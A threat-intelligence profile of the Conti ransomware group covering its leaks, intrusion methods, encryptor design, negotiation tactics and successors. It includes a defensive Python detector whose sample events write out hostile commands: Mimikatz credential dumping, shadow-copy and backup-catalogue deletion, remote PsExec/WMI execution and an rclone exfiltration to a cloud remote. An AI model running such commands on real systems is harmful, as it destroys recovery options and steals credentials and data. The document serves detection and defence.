// Threat Intelligence Profile

Conti Ransomware

One of the most destructive ransomware operations in history, active 2020–2022. Dissolved after the Conti Leaks. Analysis based on 32 negotiation transcripts spanning the group's full operational period.

Operational Overview

Conti was one of the most prolific and technically capable ransomware operations of its era, active from approximately mid-2020 until May 2022. It was closely tied to the TrickBot/BazarLoader ecosystem and is widely assessed to be the successor to Ryuk, with which it shared personnel and tooling. Unlike the loosely coupled affiliate model of groups such as LockBit, Conti ran a structured, corporate-style hierarchy: internal communications leaked in early 2022 showed a professional criminal organisation with dedicated teams for development, negotiation, HR and management, run much like a software company and paying many of its staff a salary rather than relying purely on commission-based affiliates.

The Conti Leaks (February–March 2022) followed Conti's public statement of support for Russia after the invasion of Ukraine. A Ukrainian security researcher, posting as @ContiLeaks, published roughly 168,000 internal Jabber messages spanning January 2021 to February 2022, followed by encryptor source code, operational playbooks and training material. The leak gave an unprecedented view of a ransomware group's day-to-day operations and is widely assessed to have precipitated Conti's dissolution: key members were identified, the brand was retired in May 2022, and personnel dispersed to successor operations including Black Basta, Royal, Quantum and BlackByte.

Initial Access & Entry Vectors

Conti's primary initial access mechanism was the TrickBot and BazarLoader malware families, delivered through phishing campaigns (including the BazarCall call-centre lure). The group had a symbiotic relationship with the TrickBot botnet operators: systems compromised by TrickBot were routinely handed off to Conti operators for hands-on intrusion and ransomware deployment.

The Conti playbook, first leaked by a disgruntled affiliate in August 2021 and again as part of the 2022 leaks, documented the group's post-compromise methodology with unusual specificity, including step-by-step instructions for:

  • Cobalt Strike deployment and configuration for command and control
  • Active Directory reconnaissance and domain takeover using Mimikatz and BloodHound
  • Lateral movement techniques using PsExec, WMI, and RDP
  • Defender and EDR evasion techniques
  • Data exfiltration procedures using Rclone
  • Encryption deployment via Group Policy to maximise simultaneous encryption across the environment

Conti also opportunistically exploited known vulnerabilities in public-facing systems, including the Fortinet FortiOS SSL VPN path traversal (CVE-2018-13379), the Microsoft Exchange ProxyShell chain (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) and VMware vCenter, where exploitation of Log4Shell (CVE-2021-44228) by Conti operators was reported from December 2021.

Technical Characteristics

The Conti encryptor was written in C/C++ and built primarily for speed, with string and API-call obfuscation in later versions to slow static analysis. Key technical characteristics include:

  • Multi-threaded encryption: the encryptor spawns a pool of worker threads (up to 32 in analysed samples) and hands each discovered file to the pool, saturating available cores. This made Conti significantly faster than many contemporaneous ransomware variants and shortened the window in which an EDR could interrupt it.
  • Hybrid encryption: each file is encrypted with its own symmetric key (AES-256 in early samples; ChaCha8 in the later versions whose source leaked). That per-file key is then wrapped with an RSA-4096 public key embedded in the binary, and the matching private key never leaves the operators, so decryption without payment is not feasible from the artefacts left on the victim's disk.
  • Network share enumeration: the encryptor enumerated accessible SMB shares and encrypted them itself, spreading beyond the initially compromised host without manual lateral movement during the encryption phase; a command-line switch (-m local / net / all) let operators choose local disks, network shares or both.
  • Shadow Copy deletion: standard destruction of Volume Shadow Copies and the backup catalogue, via vssadmin, wmic shadowcopy delete and wbadmin, so that Windows-native recovery is unavailable.
  • ESXi targeting: a Linux build was developed for VMware ESXi hosts, encrypting virtual machine disk files directly on the hypervisor's datastores so that every guest is taken down at once.
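The playbook steps listed under Initial Access and the encryptor's recovery-inhibition behaviour above all leave process-creation traces that an EDR or Sysmon pipeline already collects. The Python below is an added example written for this profile, not code from the page, from the leaked Conti playbook or from the encryptor: it tags simplified Sysmon Event ID 1 records with the playbook stage they correspond to and rolls the result up per host, so a responder can see which machines have reached the "shadow copies gone, encryption imminent" stage. The event records are constructed for the demo (host names, users, paths and timestamps are invented), and the regexes are illustrative signatures rather than a complete detection set.

```python
"""Flag Conti-playbook process activity in Sysmon-style process-creation events.

Added example for this profile; not tooling from the page, the leaked Conti
playbook, or the Conti encryptor. SAMPLE_EVENTS is a constructed, simplified
rendering of Sysmon Event ID 1 records: host names, user names, timestamps
and paths are invented. Technique IDs are from the public MITRE ATT&CK matrix.
"""
import re
from collections import defaultdict

# (playbook stage, rule name, ATT&CK technique, case-insensitive regex over the command line)
# Stage order follows the leaked playbook: AD recon -> credential theft ->
# lateral movement -> exfiltration -> recovery inhibition just before encryption.
RULES = [
    (1, "AD recon with SharpHound/BloodHound", "T1087.002", r"sharphound|invoke-bloodhound"),
    (2, "Credential dumping with Mimikatz", "T1003.001", r"mimikatz|sekurlsa::|privilege::debug"),
    (3, "Lateral movement via PsExec", "T1021.002", r"(?:^|\\|\s)psexec(?:64)?(?:\.exe)?\s.*\\\\"),
    (3, "Lateral movement via WMI", "T1047", r"wmic(?:\.exe)?\s+/node:.*process\s+call\s+create"),
    (4, "Exfiltration with Rclone", "T1567.002", r"rclone(?:\.exe)?\s+(?:copy|sync|move)\s"),
    (5, "Shadow copy deletion", "T1490",
     r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete"),
    (5, "Backup catalogue deletion", "T1490", r"wbadmin(?:\.exe)?\s+delete\s+catalog"),
]
_COMPILED = [(s, n, t, re.compile(rx, re.IGNORECASE)) for s, n, t, rx in RULES]

# Constructed sample telemetry: one workstation doing recon/credentials/lateral
# movement, one file server doing exfil and recovery inhibition, one benign host.
SAMPLE_EVENTS = [
    {"ts": "2021-05-10T02:11:04Z", "host": "WS-FIN-07", "user": "CORP\\j.doe",
     "cmdline": r"C:\Users\j.doe\AppData\Local\Temp\SharpHound.exe -c All --zipfilename corp.zip"},
    {"ts": "2021-05-10T02:25:41Z", "host": "WS-FIN-07", "user": "CORP\\j.doe",
     "cmdline": r'C:\Temp\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"ts": "2021-05-10T03:02:17Z", "host": "WS-FIN-07", "user": "CORP\\svc_backup",
     "cmdline": r"C:\Temp\PsExec.exe \\FS-01 -s -d cmd.exe /c C:\Temp\run.bat"},
    {"ts": "2021-05-10T03:04:55Z", "host": "WS-FIN-07", "user": "CORP\\svc_backup",
     "cmdline": r'wmic /node:"FS-02" process call create "cmd.exe /c C:\Temp\run.bat"'},
    {"ts": "2021-05-10T03:40:08Z", "host": "FS-01", "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": r"C:\Temp\rclone.exe copy \\FS-01\Finance mega:dump --transfers 10 --config C:\Temp\rclone.conf"},
    {"ts": "2021-05-11T01:12:30Z", "host": "FS-01", "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": r"vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2021-05-11T01:12:33Z", "host": "FS-01", "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": r"wbadmin delete catalog -quiet"},
    # Benign look-alikes that must not fire.
    {"ts": "2021-05-11T08:00:00Z", "host": "WS-HR-02", "user": "CORP\\a.smith",
     "cmdline": r"vssadmin.exe list shadows"},
    {"ts": "2021-05-11T08:01:10Z", "host": "WS-HR-02", "user": "CORP\\a.smith",
     "cmdline": r"rclone.exe version"},
]


def scan(events):
    """Return one finding per (event, rule) pair whose command line matches."""
    findings = []
    for ev in events:
        for stage, name, technique, rx in _COMPILED:
            if rx.search(ev["cmdline"]):
                findings.append({**ev, "stage": stage, "rule": name, "technique": technique})
    return findings


def triage(findings):
    """Collapse findings per host: furthest playbook stage reached, techniques in time order.

    A host at stage 5 has had its shadow copies or backup catalogue destroyed,
    which in the Conti playbook happens shortly before the encryptor runs.
    """
    hosts = defaultdict(lambda: {"max_stage": 0, "techniques": []})
    for f in sorted(findings, key=lambda f: f["ts"]):
        entry = hosts[f["host"]]
        entry["max_stage"] = max(entry["max_stage"], f["stage"])
        if f["technique"] not in entry["techniques"]:
            entry["techniques"].append(f["technique"])
    return dict(hosts)


if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for h in hits:
        print(f'{h["ts"]} {h["host"]:<10} stage {h["stage"]} {h["technique"]:<10} {h["rule"]}')
    for host, info in triage(hits).items():
        print(f'{host}: furthest stage {info["max_stage"]}, techniques {info["techniques"]}')
```

Two of the playbook items are deliberately absent from the rule set: Cobalt Strike beacons and Group Policy based deployment of the encryptor are not reliably visible in command lines, and need network indicators and GPO/Directory Service change auditing respectively. The stage roll-up is the useful part in practice: a host that has reached stage 4 or 5 should be isolated before any further triage of stage 1 to 3 hits.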

Negotiation Patterns & Demand Analysis

Conti operated a dedicated negotiation team, and the Conti Leaks revealed the internal communications of negotiators managing multiple active victims simultaneously. Our 32 transcripts, combined with the leaked internal data, provide an unusually comprehensive picture of Conti's negotiation approach.

Initial demands were set as a percentage of the victim's estimated annual revenue, which the leaked chats show negotiators looking up in commercial business databases such as ZoomInfo: typically 1–3% for small organisations and up to around 10% for large enterprises. Demands routinely reached into the millions of dollars, and some large enterprise demands exceeded $25M. The leaked communications confirmed that negotiators worked to internal guidelines on minimum acceptable settlements and needed management approval before agreeing to reductions below set thresholds.

Conti negotiators kept a professional, transactional tone with victims. The leaked internal chats show a different culture behind it: victims were mocked, visible distress was treated as leverage, and negotiators were coached to maximise payment rather than close early, with internal targets for deal closure.

The group ran a data leak site, "Conti News", where stolen data was published to add pressure. Our transcripts show publication being carried out against organisations that refused to pay or whose negotiations broke down, while the threat of publication was used as leverage throughout every negotiation.

Notable Incidents

  • Health Service Executive (HSE) Ireland (May 2021): one of the most damaging healthcare cyber attacks on record. Ireland's national health service was crippled, with thousands of appointments cancelled and patient records inaccessible for weeks. Conti demanded $20M; the Irish government refused to pay. Conti released a decryptor without payment within a week, but recovery costs were later estimated by the HSE in the hundreds of millions of euros.
  • Broward County Public Schools (March 2021): a $40M demand against one of the largest US school districts. The district did not pay, and Conti published stolen data on its leak site.
  • Costa Rica government (April–May 2022): attacks on the Ministry of Finance and other ministries led the incoming administration to declare a national emergency on 8 May 2022. Conti demanded $10M, later raised to $20M. Several researchers assessed the campaign as a publicity operation run while the group was already winding down after the leaks, intended to preserve the brand's credibility as personnel moved to successor operations.

Legacy and Successor Groups

Conti's dissolution in May 2022 did not end the threat from its personnel or tooling. Key members and subgroups transitioned to or created the following successor operations:

  • Black Basta: Widely considered the primary successor, using Conti's tooling and personnel
  • Royal (now BlackSuit): Operated by former Conti members
  • BlackByte, Quantum, Karakurt: Other entities with documented Conti connections

The Conti encryptor source code, leaked in March 2022, has been repurposed by multiple subsequent threat actors, extending Conti's technical legacy well beyond the group's formal dissolution.

View Negotiation Transcripts

All 32 Conti ransomware negotiation transcripts are available in our public archive, documenting negotiations across the group's 2020–2022 operational period.

Quick Reference

Status: DEFUNCT
Active period: 2020 – May 2022
Transcripts: 32
Demand range: $1M – $25M+
Model: Corporate RaaS / double extortion
Primary targets: All sectors, enterprise focus
Entry vectors: TrickBot, BazarLoader, phishing
Dissolved: May 2022 (post-Conti Leaks)

Key Negotiation Insights

Tone: Professional externally, aggressive internally
Negotiability: Moderate (internal approval required)
Timeline pressure: High
Data leak site: Conti News (now offline)
Min settlement: Internal thresholds documented in leaks
